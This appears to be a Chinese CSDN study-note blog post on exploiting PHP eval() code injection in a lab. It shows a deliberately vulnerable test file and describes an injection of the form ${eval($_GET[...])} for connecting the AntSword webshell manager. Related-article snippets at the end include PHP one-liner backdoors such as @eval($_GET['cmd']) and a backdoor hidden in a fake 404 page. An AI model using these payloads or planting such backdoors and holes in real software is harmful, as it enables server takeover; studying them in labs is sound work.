[eval函数利用]

最新推荐文章于 2022-10-20 16:45:51 发布

XiXioo1

最新推荐文章于 2022-10-20 16:45:51 发布

阅读量5.4k

点赞数

分类专栏： # 打卡学习记录文章标签： web安全

本文链接：https://blog.csdn.net/qq_44836237/article/details/123402730

版权

打卡学习记录专栏收录该内容

24 篇文章 0 订阅

订阅专栏

因为这里有点绕，如果忘记了可以看看必火p113那几个视频（代码执行题目）

用的webshell管理工具是蚁剑

注意的点（蚁剑$_GET代码执行有点问题如果连接不上就换成$_POST请求）

新建一个test111.php，代码如下：
并尝试用蚁剑连接
<?php
$data=$_GET['data'];
eval("\$ret = strtolower(\"$data\");");
echo $ret;
?>

动态调试

这里先往data传一个参数是用来占位，动态调试的时候方便看

接下来调试的时候报错了。。。

这个报错暂时解决不了，说一下思路吧，关键就是理解eval()函数的作用，比如eval($code)，就相当于把$code的值拿出来

可以参考必火p110-p113的讲解

eval()函数代码执行有两种写法

第一种是在传参前构造特殊请求体闭合前面内容，后面跟一个$_GET['自定义密码']

第二种直接在传参中写${eval($_GET[自定义密码])}，这里编译器可能会报错，但是确实能代码执行

（这里的自定义密码作为蚁剑的连接密码）

如果上面的回顾的时候看不明白可以回看必火p113讲的很清楚

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

XiXioo1

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

php后门绕过eval关键字,一些变态的PHP一句话后门收集

weixin_42181929的博客

03-18

1836

这类后门让网站、服务器管理员很是头疼，经常要换着方法进行各种检测，而很多新出现的编写技术，用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...

代码执行漏洞

cxrpty的博客

02-27

614

实验环境:php5.2、Apache 实验原理：当应用在调用一些能将字符串转化成代码的函数时，没有考虑用户是否能够控制这个字符串，将造成代码注入漏洞实验步骤：实验一： 1.php代码如下： <?php $data=$_GET['data']; echo preg_replace("/test/e",$data,"just test"); ?> 2.在前端给da...

参与评论您还未登录，请先登录后发表或查看评论

CISP-PTE学习总结之基础练习题（二）

千寻的博客

10-20

8167

基础题目一：SQL注入 0x01 题目要求 0x02 解题过程基础题目二：文件上传突破 0x01 题目要求 0x02 解题过程基础题目三：文件包含 0x01 题目要求 0x02 解题过程 0x03 解题总结基础题目四：代码执行漏洞 0x01 题目要求 0x02 解题过程 0x03 解题总结基础题目五：失效的访问控制 0x01 题目要求 0x02 解题过程

php实现兼容Unicode文字的字符串大小写转换strtolower()和strtoupper()

不求前途凶吉，但求落幕无悔！

11-13

929

方法一简介 PHP的strtolower()和strtoupper()函数在安装非中文系统的服务器下可能会导致将汉字转换为乱码，请写两个替代的函数实现兼容Unicode文字的字符串大小写转换。原因是：中文是由多字节组成的，而只有英文系统的单个英文字符只有一个字节，所以该系统把中文的每一个字节都做了strtolower()处理,改变后的中文字节拼接在一起就成了乱码（新生成的编码映射对应的字

CISP试题及答案.pdf

08-17

CISP试题及答案.pdf

9_任意代码执行(字符串转换成代码执行)

weixin_33904756的博客

08-31

2759

一、背景介绍　　当应用在调用一些能将字符串转化为代码的函数（如php中的eval）时，没有考虑用户是否能控制这个字符串，将造成代码注入漏洞。狭义的代码注入通常指将可执行代码注入到当前页面中，如php的eval函数，可以将字符串代表的代码作为php代码执行，当用户能够控制这段字符串时，将产生代码注入代码注入漏洞（也称命令执行）。广义上的代码注入，可以覆盖大半安全漏洞的分类。二、漏洞成因　...

java实现eval函数

09-06

然而，如果你提供的压缩包"java实现eval函数"包含的是一个Java项目，那么它很可能是实现了类似功能的自定义解决方案，可能是一个解析器或者编译器，用于处理特定的表达式或脚本语法。这个项目可能包括以下几个部分：...

javascript eval函数深入认识

11-30

JavaScript 中的 `eval` 函数是一个非常强大但同时也极具争议的工具。它的主要作用是将一个字符串作为 JavaScript 代码执行。在深入理解 `eval` 的用法和注意事项之前，我们首先要明白，`eval` 是一个危险的功能，...

php eval函数用法 PHP中eval()函数小技巧

12-19

`eval()`函数在PHP中是一个非常强大的功能，它允许我们将字符串作为PHP代码执行。这个函数在处理动态生成的代码或解析来自外部数据源（如数据库）的PHP指令时非常有用。然而，由于其潜在的安全风险，使用时需格外...

详解python eval函数的妙用

09-21

Python的`eval()`函数是一个非常强大且用途广泛的工具，它允许我们将字符串当作Python代码执行，然后返回计算结果。`eval()`函数通常用于动态执行代码、解析数据或在某些情况下简化编程逻辑。 `eval(expression, ...

CISP全套考试题目带答案

11-27

收集了历年的cisp考试题目、700道cisp考试题目，共有6套考试题目，一套练习题库

任意代码执行漏洞

LJH1999ZN的博客

02-23

3371

一、什么是任意代码执行漏洞 web应用程序是指程序员在代码中使用了一些执行函数例如eval，assert等函数，用户可以控制这个字符串去这些函数中执行，从而造成安全漏洞二、漏洞的危害执行任意的代码，例如协议脚本文件向网站写入webshell 控制整个网站或者服务器三、任意代码执行的漏洞 1.eval()函数 ...

每天一个php函数之：strtolower() 函数

</SCORPION>

05-21

820

把所有字符转换为小写：定义和用法strtolower() 函数把字符串转换为小写。注释：该函数是二进制安全的。相关函数：lcfirst() - 把字符串中的首字符转换为小写strtoupper() - 把字符串转换为大写ucfirst() - 把字符串中的首字符转换为大写ucwords() - 把字符串中每个单词的首字符转换为大写语法strtolower(string)参数描述string必需。规...

PHP常用函数

CleverCode的博客

10-15

1507

CleverCode总结了一下php常用函数，记忆这些函数，基本能够满足大部分的需求。(blog.csdn.net/CleverCode) 1 I/O函数 1.1 flush 函数描述：flush(); 说明：函数Flush 刷新PHP 的输出缓存，它尽量将缓和存中的内容输出到用户的浏览器。返回值：无 1.2 print 函数描述：print(string arg,string[...

漏洞复现篇——任意代码命令执行漏洞复现及防御

爱国小白帽

02-27

4020

什么是代码执行：当应用在调用一些能将字符串转化成代码的函数时，没有考虑用户是否能够控制这个字符串，将造成代码注入漏洞。代码执行函数：在php中：eval，assert,preg_replace(‘/*/e’, 'ret="1";′,ret = "\\1";',ret="1";′,data); 在asp中：eval, exevute,executeglobal 在jsp中：jsp中没有p...

PHP一句话木马

m0_64338211的博客

12-03

437

1.get.php <?php header("Content-Type: text/html;charset=gb2312"); @eval($_GET['cmd']); ?> http://127.0.0.1/get.php?cmd=system('whoami'); 2.post.php <?php header("Content-Type: text/html;charset=gb2312"); @eval($_POST['cmd']); ?> http:/...

怎么使用php后门,PHP后门的一些用法

weixin_36078790的博客

03-29

538

今天我们说一些最常见的PHP留后门的一些用法首先，写一个最简单的后门，也可以叫做木马。

php代码执行漏洞的危害,代码执行漏洞

weixin_42097508的博客

03-19

1058

代码执行当应用在调用一些能将字符转化为代码的函数(如PHP中的eval)时，没有考虑用户是否能控制这个字符串，这就会造成代码执行漏洞。相关函数PHP：eval assertPython：execasp：Java：没有类似函数，但采用的反射机制和各种基于反射机制的表达式引擎(OGNL、SpEL、MVEL等)有类似功能phpcms中的string2array函数这个函数可以将phpcms的数据库set...

eval函数读取文件 ctf